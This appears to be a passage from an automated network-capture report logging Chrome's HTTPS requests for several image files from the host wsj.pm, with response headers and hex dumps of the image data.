                                                                                                                2024-04-25 14:58:20 UTC7486INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 37 38 33 22 20 68 65 69 67 68 74 3d 22 31 31 32 2e 35 38 38 22 3e 3c 70 61 74 68 20 64 3d 22 4d 32 31 2e 36 35 32 20 36 31 2e 35 34 34 63 30 20 33 2e 30 32 33 2e 38 37 38 20 33 2e 36 30 37 20 32 2e 38 32 39 20 34 2e 30 39 37 6c 33 2e 30 32 33 2e 36 38 33 76 31 2e 33 36 35 48 37 2e 34 31 32 76 2d 31 2e 33 36 35 6c 32 2e 35 33 36 2d 2e 35 38 34 63 31 2e 39 35 31 2d 2e 34 38 37 20 32 2e 38 32 39 2d 31 2e 34 36 35 20 32 2e 38 32 39 2d 34 2e 31 39 33 56 32 2e 34 33 38 68 2d 32 2e 31 34 36 63 2d 36 2e 30 34 37 20 30 2d 38 2e 34 38 35 20 39 2e 38 35 31 2d 39 2e 31 36 38 20 32 30 2e 32 38 37 48 30 56 2e 34 38 38 68 33 34 2e
                                                                                                                Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="783" height="112.588"><path d="M21.652 61.544c0 3.023.878 3.607 2.829 4.097l3.023.683v1.365H7.412v-1.365l2.536-.584c1.951-.487 2.829-1.465 2.829-4.193V2.438h-2.146c-6.047 0-8.485 9.851-9.168 20.287H0V.488h34.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                30192.168.2.1749749103.113.70.374436544C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:58:20 UTC354OUTGET /img/wsj-social-share.png HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                Accept: */*
                                                                                                                Sec-Fetch-Site: none
                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:20 UTC251INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:20 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Wed, 17 Apr 2024 11:18:50 GMT
                                                                                                                ETag: "8f91-6164904d8ba80"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 36753
                                                                                                                Connection: close
                                                                                                                Content-Type: image/png
                                                                                                                2024-04-25 14:58:20 UTC7941INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 04 b0 00 00 02 76 08 06 00 00 00 4f 40 7b 5c 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 40 00 49 44 41 54 78 01 ec dd 07 9c 5d 55 b9 f7 f1 27 99 64 52 27 c9 a4 f7 5e 26 99 0c 26 31 88 91 5e 14 54 9a 57 10 a4 78 55 8a 94 08 22 22 e0 0b 2a 58 62 44 c0 96 ab 14 11 b8 70 f5 02 ca 95 0b 0a a1 aa 28 52 a4 44 4a 7a 27 7d d2 26 65 26 6d de fb 1c 39 71 92 9c 39 b3 f6 39 bb 3c 6b 9f df fe 7c b8 c9 9c b3 f7 da cf fa ae 1d ae f9 b3 d6 da ad 1a ff ef 10 0e 04 10 40 00 01 04 10 40 00 01 04 10 40 00 01 04 10 40 00 01 04 8c 0a b4 36 5a 17 65 21 80 00 02 08 20 80 00 02 08 20 80 00 02 08 20 80 00 02 08 20 90 11 20 c0 e2 41 40 00 01 04 10 40 00 01 04 10 40 00 01 04 10 40 00 01 04 10 30 2d 40 80 65 7a 78 28 0e 01 04 10
                                                                                                                Data Ascii: PNGIHDRvO@{\sRGB@IDATx]U'dR'^&&1^TWxU""*XbDp(RDJz'}&e&m9q99<k|@@@@6Ze! A@@@@0-@ezx(
                                                                                                                2024-04-25 14:58:20 UTC8000INData Raw: 6f 1c 0c 6b d3 76 ed 87 6e 52 ad 6f 54 f4 e1 d0 7f 4f e9 c6 ee ba 5f 17 47 7a 04 46 8c 18 61 ae 33 04 58 e6 86 84 82 10 40 00 81 58 04 08 b0 62 61 e6 26 08 20 80 40 f1 02 16 f7 21 d1 5e f9 3a 03 4b 97 3e f6 e8 d1 a3 f8 81 09 b9 05 7d bb 5b a9 1f 3d 7b f6 2c 88 40 67 af e9 1b 1c 93 3a 7e fa d3 9f ca 9b 6f be 19 ea ed 75 83 f4 d6 ad fd f9 9f 6b 03 07 0e 94 19 33 66 88 6e f0 ce 91 0e 01 8b 81 64 a1 ff 8e 48 c7 88 d0 0b 04 10 40 a0 74 05 fc f9 5f 44 a5 3b 46 f4 1c 01 04 10 c8 08 e8 32 42 8b 87 ce ba f0 f5 38 f8 e0 83 cd 95 ee b3 67 58 98 dd ba 75 2b a8 a9 23 8f 3c 52 74 73 e7 24 8e 45 8b 16 c9 cf 7e f6 b3 50 6f ad c1 d5 e9 a7 9f 1e 6a 9b 71 34 a6 b3 1b 2f b8 e0 82 38 6e c5 3d 62 10 b0 18 aa b7 6f df 3e 86 9e 73 0b 04 10 40 00 01 6b 02 04 58 d6 46 84 7a 10 40
                                                                                                                Data Ascii: okvnRoTO_GzFa3X@Xba& @!^:K>}[={,@g:~ouk3fndH@t_D;F2B8gXu+#<Rts$E~Pojq4/8n=bo>s@kXFz@
                                                                                                                2024-04-25 14:58:20 UTC8000INData Raw: ac 5e bd 3a 57 99 91 7f 36 77 ee 5c d9 b9 73 a7 d3 7d f2 cd c0 d2 25 99 a3 47 8f 76 6a 27 ea 93 92 de c8 dd 35 40 b3 14 a2 46 3d 26 1a f0 0c 1e 3c 38 ea db 24 d6 fe 5d 77 dd 25 b7 de 7a 6b 62 f7 e7 c6 08 20 80 00 02 08 20 90 7e 01 02 ac f4 8f 31 3d 44 00 01 04 72 0a d4 d4 d4 e4 fc 3c a9 0f 5d 67 ed 84 5d 9f eb 72 bb 2e 5d ba c8 80 01 03 f2 de de ca 72 b8 24 03 2c 7d ab a4 06 92 2e 87 a5 10 d5 a5 de 62 ce e9 dc b9 b3 fc f8 c7 3f 96 b6 6d db 16 d3 8c e9 6b 7f fa d3 9f ca 6d b7 dd 66 ba 46 8a 43 00 01 04 10 40 00 01 7f 05 08 b0 fc 1d 3b 2a 47 00 01 04 8a 12 e8 dd bb b7 e8 5b f5 ac 1c 49 05 58 ef bc f3 8e 13 41 be d9 57 d9 06 ac 84 82 eb d6 ad 4b 6c 46 5b 90 71 2c a5 00 4b 9f 11 7d 3e ae ba ea aa ec e3 92 ca 5f bf ff fd ef cb 7f fe e7 7f a6 b2 6f 74 0a 01 04
                                                                                                                Data Ascii: ^:W6w\s}%Gvj'5@F=&<8$]w%zkb ~1=Dr<]g]r.]r$,}.b?mkmfFC@;*G[IXAWKlF[q,K}>_ot
                                                                                                                2024-04-25 14:58:20 UTC8000INData Raw: 6b 6b e5 ec b3 cf 96 39 73 e6 1c d0 d7 38 3e f8 c6 37 be 21 8b 17 2f 8e e3 56 dc 03 01 04 10 40 00 81 44 05 08 b0 12 e5 e7 e6 08 20 80 80 ff 02 ba 9c 6c cc 98 31 e6 3b e2 c3 f2 c1 2c a2 f5 65 99 04 58 d9 91 da f7 d7 37 df 7c 73 df 0f f8 29 a7 40 79 79 b9 1c 71 c4 11 39 bf f3 ed c3 ba ba 3a 39 e7 9c 73 24 c9 25 a4 5b b7 6e 95 2f 7d e9 4b a2 21 2a 07 02 08 20 80 00 02 69 16 20 c0 4a f3 e8 d2 37 04 10 40 20 26 01 eb 81 8b 32 f8 b0 81 7b 76 b8 ac 2f 23 24 c0 ca 8e d4 be bf fe e3 1f ff d8 f7 03 7e 6a 56 20 c9 65 84 ed da b5 6b b6 ae a0 5f 5c 79 e5 95 32 77 ee dc a0 97 85 7e be 3e 7b bf f9 cd 6f 42 6f 97 06 11 40 00 01 04 10 b0 24 40 80 65 69 34 a8 05 01 04 10 f0 54 c0 7a e0 a2 ac 3e 05 58 35 35 35 66 9f 04 5d de 38 70 e0 40 b3 f5 25 59 18 01 96 bb fe 21 87 1c
                                                                                                                Data Ascii: kk9s8>7!/V@D l1;,eX7|s)@yyq9:9s$%[n/}K!* i J7@ &2{v/#$~jV ek_\y2w~>{oBo@$@ei4Tz>X555f]8p@%Y!
                                                                                                                2024-04-25 14:58:20 UTC4812INData Raw: be f8 e2 4d 06 7e e8 a1 87 6e f2 73 b7 7f 88 59 89 33 67 ce 6c bc 9e 7c f2 c9 f4 d3 9f fe 34 2d 5a b4 28 2d 5d ba 34 3d f5 d4 53 95 95 17 b7 02 8e 1e 3d ba b1 f8 78 84 55 11 5c c5 cf b6 ea 05 06 0f 1e dc 78 02 65 df ba 61 ab 56 ad 6a dc 3a fa d0 43 0f a5 15 2b 56 34 5e 7f f9 cb 5f 5a be 70 3c 48 63 d4 a8 51 e9 80 03 0e 68 bc 22 d8 8e e0 2a 02 49 1b 01 02 04 08 10 e8 35 81 9d 5e fc ff ad d7 8a 52 0f 01 02 04 08 94 23 b0 7c f9 f2 f4 cc 33 cf 34 35 e0 f8 63 39 82 2f db 96 02 0f 3c f0 40 7a e1 85 17 b6 7c 63 b3 df c4 1f ac 31 cb c2 56 86 c0 13 4f 3c d1 58 57 69 e5 ca 95 29 5e 11 70 ad 5e bd 3a fd e7 3f ff 49 eb d6 ad 6b 7c 8d cf 4d ac 69 14 b7 00 6e fc 1a 36 6c 58 23 dc 88 db 01 23 c8 8b 70 c3 0c ab de f9 dc 44 df fe f9 cf 7f 36 fa f8 fc f3 cf a7 78 c5 ad a4
                                                                                                                Data Ascii: M~nsY3gl|4-Z(-]4=S=xU\xeaVj:C+V4^_Zp<HcQh"*I5^R#|345c9/<@z|c1VO<XWi)^p^:?Ik|Min6lX##pD6x


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                31192.168.2.1749750103.113.70.374436544C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:58:20 UTC348OUTGET /img/im-949345.jpeg HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                Accept: */*
                                                                                                                Sec-Fetch-Site: none
                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:20 UTC252INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:20 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Wed, 17 Apr 2024 11:15:57 GMT
                                                                                                                ETag: "9697-61648fa88f540"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 38551
                                                                                                                Connection: close
                                                                                                                Content-Type: image/jpeg
                                                                                                                2024-04-25 14:58:20 UTC7940INData Raw: ff d8 ff db 00 43 00 06 04 05 06 05 04 06 06 05 06 07 07 06 08 0a 10 0a 0a 09 09 0a 14 0e 0f 0c 10 17 14 18 18 17 14 16 16 1a 1d 25 1f 1a 1b 23 1c 16 16 20 2c 20 23 26 27 29 2a 29 19 1f 2d 30 2d 28 30 25 28 29 28 ff db 00 43 01 07 07 07 0a 08 0a 13 0a 0a 13 28 1a 16 1a 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 ff c0 00 11 08 01 55 02 5f 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 03 00 02 04 05 06 01 07 08 ff c4 00 4f 10 00 02 01 03 02 02 06 06 08 03 05 05 07 04 01 05 01 02 03 00 04 11 05 21 12 31 06 13 41 51 61 71 14 22 32 81 91 a1 07 23 42 52 62 b1 c1 d1 15 33 72 24 43 82 92 e1 16 34 53 63 f0 44 73
                                                                                                                Data Ascii: C%# , #&')*)-0-(0%()(C(((((((((((((((((((((((((((((((((((((((((((((((((((U_"O!1AQaq"2#BRb3r$C4ScDs
                                                                                                                2024-04-25 14:58:20 UTC8000INData Raw: 7a a7 6e 74 25 63 8a 72 1c b1 ee da a5 96 4c 53 b5 77 bf 7c 52 b3 b4 9a e7 3e 8e 8d c2 39 b7 25 15 6f 6d a3 0c 06 b9 9b 39 ec 8c 7e a6 92 b1 3a 28 df 6f 2a 51 c5 24 ad 88 d1 9b fa 46 6b 51 15 95 a4 38 e1 85 4f 8b fa c7 e7 46 37 0a 83 09 8f 00 36 15 56 65 56 66 53 49 ba 6d d6 13 1b 77 92 07 ca 9c 74 09 1c e6 73 02 b7 78 c9 3f 2a ba 96 f0 f2 05 43 77 0d ea 2b b4 ae 4e 0c 8c d8 e4 a0 ef 46 e9 76 3f ad 90 d3 43 44 20 8b c9 0f 87 08 23 e7 bd 49 5b 28 62 c0 e3 91 b1 be 06 29 8d 0d c0 64 0b 0c cd 93 eb 1e ac ed 49 e2 9c 6c 20 b8 27 fe ed aa d6 45 ec 87 8d 87 ea 62 0b 92 18 79 b0 a1 98 e1 f1 f8 d5 75 e3 35 be 0c f1 cb 11 3b 02 f1 95 1f 12 2a 31 9d cb 30 52 57 84 ef 8a b5 3b e8 cd c2 8b 70 91 1e 45 8f 95 34 c6 a3 18 2d f0 15 0a 1b 92 a4 75 8c 00 c7 3a 77 5e e5 b2
                                                                                                                Data Ascii: znt%crLSw|R>9%om9~:(o*Q$FkQ8OF76VeVfSImwtsx?*Cw+NFv?CD #I[(b)dIl 'Ebyu5;*10RW;pE4-u:w^
                                                                                                                2024-04-25 14:58:20 UTC8000INData Raw: 44 8a a5 e9 3e 87 1e b3 67 84 22 3b c8 c1 31 49 ff 00 c4 f8 1a b9 a5 4a 51 52 54 ca 4e 9d a3 e7 be 94 68 0d 7f 14 a8 d0 b2 de 43 95 2a c3 04 e3 9a 9f d2 bc d3 81 2d e7 31 4b 1c 8a c3 91 57 c7 c8 d7 d5 5d 2e d0 bd 3e 23 77 66 a3 d3 63 1e b2 ff 00 c5 51 d9 e7 dd 5e 17 d3 3d 11 6e 03 5e 40 80 1c fa e0 6d 86 ef fd eb cd cb 8d e3 67 a1 8a 7f 62 32 4b 90 3d 49 df 1f 88 03 f9 1a 42 49 87 da 46 f0 ce 3f 3a 0c 07 ec 86 91 19 76 20 ef 52 09 97 b0 c6 c3 f1 0c 56 4c d5 0c 2f 27 36 84 91 e1 83 51 dd a3 c7 af 18 5f 35 c5 49 25 c0 c9 81 0f f4 b0 34 c7 91 46 38 91 d7 dc 6a 46 46 e3 8f 3e ae 07 95 3f ae 3f 7b 34 9d ed df da 58 c9 f1 14 36 8e 16 e4 08 fe 96 a0 63 5e 62 c4 ab 20 20 76 f7 d5 9e 8f 1a ba bf 0a 80 49 df 02 aa 1a 2f 58 aa c8 e3 c4 80 6a ff 00 a3 50 90 18 96 2d
                                                                                                                Data Ascii: D>g";1IJQRTNhC*-1KW].>#wfcQ^=n^@mgb2K=IBIF?:v RVL/'6Q_5I%4F8jFF>??{4X6c^b vI/XjP-
                                                                                                                2024-04-25 14:58:20 UTC8000INData Raw: 17 7a 7b 1e 5c 6c 9f 11 5d 07 7a ec f2 73 5f 04 eb 15 b5 32 21 bb 90 84 27 70 a0 ed e2 68 b2 dc 58 31 7e ae d2 45 dc 70 fa f9 c0 ed cf 79 aa ce 21 9e 74 e0 69 50 59 2a 79 61 6b 8e 28 a1 09 16 c0 21 25 bd e6 ac 23 b9 d3 d5 e4 fa 82 57 80 22 02 83 3e 24 ef ce a9 15 b3 21 df 95 3d 9c 05 3f 97 7d 0d 58 ec 9f 75 3d b4 f1 c6 2d a0 08 a1 40 2c 57 84 93 e5 4f b1 6b 78 e4 56 96 25 38 e7 c5 92 0f bb b2 a0 46 78 63 00 f3 02 88 0e 69 57 05 22 d2 79 6c 3a 96 58 e0 25 d8 e0 90 37 51 e0 48 e7 ee aa e2 80 b1 e1 07 87 3b 66 98 f3 24 4a 0c 8c 06 79 0e d3 e4 28 f6 f6 f2 5c ef 38 31 43 f7 01 f5 9b cf bb ca 95 51 54 02 35 69 9c a5 ba 86 61 ed 31 f6 57 f7 ab 1b 2d 35 21 62 e7 2f 31 e6 ed cf dd dd 53 ed 20 50 12 28 50 0e c5 55 15 70 b1 da e9 b1 09 ef 9d 78 cf b2 9c f2 7f 5a 89
                                                                                                                Data Ascii: z{\l]zs_2!'phX1~Epy!tiPY*yak(!%#W">$!=?}Xu=-@,WOkxV%8FxciW"yl:X%7QH;f$Jy(\81CQT5ia1W-5!b/1S P(PUpxZ
                                                                                                                2024-04-25 14:58:20 UTC6611INData Raw: 81 59 fc 94 e2 b5 82 da 04 3f 57 6c 8a 7b ce e7 e2 69 e5 df 87 19 38 e5 80 6a 1e 64 ba 2d 63 6c cc 2f 47 ae 46 ef d5 c6 3f e6 10 2a 4c 7a 0c 0a 3e ba e8 1c 73 11 c7 fa 9a ba 20 92 3d 43 bf 7f 65 70 86 c6 78 48 f2 15 0f 3c bc 15 f4 af 25 74 7a 5d 8c 5c a3 2f 8f f8 87 3f 95 19 56 da 32 42 08 90 8e c5 5c 54 a2 31 9c ab 66 a3 4d 77 04 64 06 53 9e c0 17 3f 95 2d e7 2f 25 69 08 f8 1a 5a 16 1b b8 3b 76 9a a0 e9 2f 48 f4 dd 08 44 b7 21 e4 92 50 48 48 f0 4e 07 69 26 ad ae 2f 3d 5c db db a9 6e c2 fb 0f ca aa 2f ad 17 51 8c 2e a1 65 6f 29 e4 31 17 21 e6 46 6a e1 8d b7 6c ce 79 12 55 13 cd 3a 75 d2 98 35 eb 54 b7 b6 eb 2d a1 43 c4 41 f5 b8 cf 61 3e 5b d7 9c bc 7b 90 06 7c 71 5f 40 3f 47 f4 b1 ec e9 36 a0 8f f9 7f e9 40 6d 0e c4 12 57 4c b3 cf fd d7 fa 57 52 6a 2a 91
                                                                                                                Data Ascii: Y?Wl{i8jd-cl/GF?*Lz>s =CepxH<%tz]\/?V2B\T1fMwdS?-/%iZ;v/HD!PHHNi&/=\n/Q.eo)1!FjlyU:u5T-CAa>[{|q_@?G6@mWLWRj*


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                32192.168.2.1749751103.113.70.374436544C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:58:20 UTC347OUTGET /img/im-949675.png HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                Accept: */*
                                                                                                                Sec-Fetch-Site: none
                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:20 UTC250INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:20 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Wed, 17 Apr 2024 11:16:09 GMT
                                                                                                                ETag: "21c5-61648fb401040"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 8645
                                                                                                                Connection: close
                                                                                                                Content-Type: image/png
                                                                                                                2024-04-25 14:58:20 UTC7942INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 1f 00 00 00 c0 08 02 00 00 00 b2 2a f0 54 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 20 00 49 44 41 54 78 9c ed 5d 7d 6c 1c 45 96 f7 9f 04 f2 81 58 f6 8e 5d 40 41 da 45 27 6e 21 d1 c1 69 74 ab cb e1 40 df 87 08 ba 1b cd 29 82 3b 85 1d eb 50 20 44 db 52 f8 10 3a b5 94 64 ec 40 1a 27 67 76 92 30 a3 24 66 91 19 86 55 d8 f3 c6 1d 7b 12 3b 84 36 c6 5e 6f 9c 06 3b 5e 73 d8 73 8a d7 44 76 66 7d 1c 46 f9 98 93 15 29 ff cc c9 f3 92 97 97 ea 9e f6 cc 78 66 ba 7b e6 fd 54 b2 66 ca 35 d5 55 d5 ef d7 ef d5 ab aa d7 75 19 06 83 51 1e d4 95 a9 5e 06 83 c1 ec 62 30 ca 05 66 17 83 51 4e 76 05 08 24 49 92 65 59 d7 f5 42 2b 82 9f a7 52 a9 3c cb a7 52 29 f8 89 f9 5f 4a 16 50 15 ad 96 e6 43 0d
                                                                                                                Data Ascii: PNGIHDR*TpHYs~ IDATx]}lEX]@AE'n!it@);P DR:d@'gv0$fU{;6^o;^ssDvf}F)xf{Tf5UuQ^b0fQNv$IeYB+R<R)_JPC
                                                                                                                2024-04-25 14:58:20 UTC703INData Raw: b3 e4 ff 3a de 56 47 d2 d1 fe df e7 d3 f7 6a d5 5d db 7f d5 57 b3 ec 8a 77 0f 56 82 5d f5 f5 eb 1f 63 30 18 05 62 78 78 78 71 76 bd f0 c2 0b 96 e5 6a 01 b5 dc f7 4c 26 f3 d8 63 8f 65 6a 15 8f 95 a7 ef cc ae 9b 60 76 65 6a 15 8f 55 86 5d 5d 5d 5d 7f fc e3 1f 33 35 89 5a ee 7b 26 93 39 7c f8 70 a6 56 71 b8 3c 7d 17 d9 c5 60 30 4a 05 66 17 83 51 2e 30 bb 18 8c 72 81 d9 c5 60 94 9f 5d c9 64 32 18 0c 2e 84 74 95 24 c3 30 32 99 4c 3a 9d 96 65 d9 e7 f3 c9 b2 9c 4e a7 17 76 d0 a7 52 90 23 49 92 ae eb f8 43 45 51 7c 3e 5f c6 23 48 26 93 d0 5a 73 97 2d 3b 58 65 f0 f9 7c c9 64 d2 dc d3 48 24 12 08 04 e0 b8 be a6 69 99 2a 85 2f 47 f7 11 aa aa 96 4a 98 6f b2 4b 92 a4 58 2c 66 18 86 aa aa 81 40 00 2e 03 bc 92 65 39 12 89 64 32 99 60 30 18 89 44 92 c9 64 2c 16 83 16 a4
                                                                                                                Data Ascii: :VGj]WwV]c0bxxxqvjL&cej`vejU]]]]35Z{&9|pVq<}`0JfQ.0r`]d2.t$02L:eNvR#ICEQ|>_#H&Zs-;Xe|dH$i*/GJoKX,f@.e9d2`0Dd,


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                33192.168.2.1749753103.113.70.374436544C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:58:20 UTC575OUTGET /img/im-949723.jpeg HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                Sec-Fetch-Dest: image
                                                                                                                Referer: https://wsj.pm/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:20 UTC250INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:20 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Wed, 17 Apr 2024 11:17:39 GMT
                                                                                                                ETag: "4da-61649009d5ac0"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 1242
                                                                                                                Connection: close
                                                                                                                Content-Type: image/jpeg
                                                                                                                2024-04-25 14:58:20 UTC1242INData Raw: ff d8 ff db 00 43 00 06 04 05 06 05 04 06 06 05 06 07 07 06 08 0a 10 0a 0a 09 09 0a 14 0e 0f 0c 10 17 14 18 18 17 14 16 16 1a 1d 25 1f 1a 1b 23 1c 16 16 20 2c 20 23 26 27 29 2a 29 19 1f 2d 30 2d 28 30 25 28 29 28 ff db 00 43 01 07 07 07 0a 08 0a 13 0a 0a 13 28 1a 16 1a 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 ff c0 00 11 08 00 3e 00 6e 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 04 00 02 03 05 06 01 07 08 ff c4 00 37 10 00 02 01 03 02 02 07 04 08 07 00 00 00 00 00 00 01 02 03 00 04 11 05 21 12 31 06 13 32 41 51 61 81 14 71 91 a1 07 22 23 42 52 82 92 d1 62 72 83 b1 c1 e1 f0 ff c4 00 18 01 00 03 01 01
                                                                                                                Data Ascii: C%# , #&')*)-0-(0%()(C(((((((((((((((((((((((((((((((((((((((((((((((((((>n"7!12AQaq"#BRbr


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                34192.168.2.1749754103.113.70.374436544C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:58:20 UTC348OUTGET /img/im-948848.jpeg HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                Accept: */*
                                                                                                                Sec-Fetch-Site: none
                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:20 UTC251INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:20 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Wed, 17 Apr 2024 11:16:24 GMT
                                                                                                                ETag: "2572-61648fc24f200"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 9586
                                                                                                                Connection: close
                                                                                                                Content-Type: image/jpeg
                                                                                                                2024-04-25 14:58:20 UTC7941INData Raw: ff d8 ff db 00 43 00 06 04 05 06 05 04 06 06 05 06 07 07 06 08 0a 10 0a 0a 09 09 0a 14 0e 0f 0c 10 17 14 18 18 17 14 16 16 1a 1d 25 1f 1a 1b 23 1c 16 16 20 2c 20 23 26 27 29 2a 29 19 1f 2d 30 2d 28 30 25 28 29 28 ff db 00 43 01 07 07 07 0a 08 0a 13 0a 0a 13 28 1a 16 1a 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 ff c0 00 11 08 00 bf 01 1f 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 05 02 03 04 06 07 01 00 08 ff c4 00 3d 10 00 02 01 03 03 02 04 02 08 06 02 01 03 05 00 00 01 02 03 00 04 11 05 12 21 06 31 13 41 51 61 22 71 07 14 23 32 42 81 91 a1 33 52 b1 c1 d1 f0 72 e1 15 34 82 f1 08 16 24 62 73 ff c4 00
                                                                                                                Data Ascii: C%# , #&')*)-0-(0%()(C((((((((((((((((((((((((((((((((((((((((((((((((((("=!1AQa"q#2B3Rr4$bs
